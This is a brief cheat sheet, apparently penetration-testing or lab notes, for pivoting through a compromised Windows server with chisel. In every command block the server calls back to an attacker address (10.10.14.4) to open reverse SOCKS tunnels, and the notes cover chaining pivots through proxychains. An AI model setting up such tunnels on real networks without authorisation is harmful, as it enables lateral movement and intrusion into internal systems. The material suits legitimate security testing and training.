==============================================================================
[+] Hacker Machine
==============================================================================
# Terminal #1
./chisel server --reverse --port 8000

# And other terminal
./chisel client 127.0.0.1:8001 socks

==============================================================================
[+] Windows Server Machine 
==============================================================================
# Cmd #1
chisel.exe client 10.10.14.4:8000 R:8001:127.0.0.1:9001

# Cmd #2
chisel.exe server -p 9001 --socks5

==============================================================================
[+] More than one Pivote
==============================================================================
# https://ap3x.github.io/posts/pivoting-with-chisel/
# Cmd #3
chisel.exe client 10.10.14.4:8002 R:2080:socks
#add to proxychains.conf socks5 127.0.0.1 2080


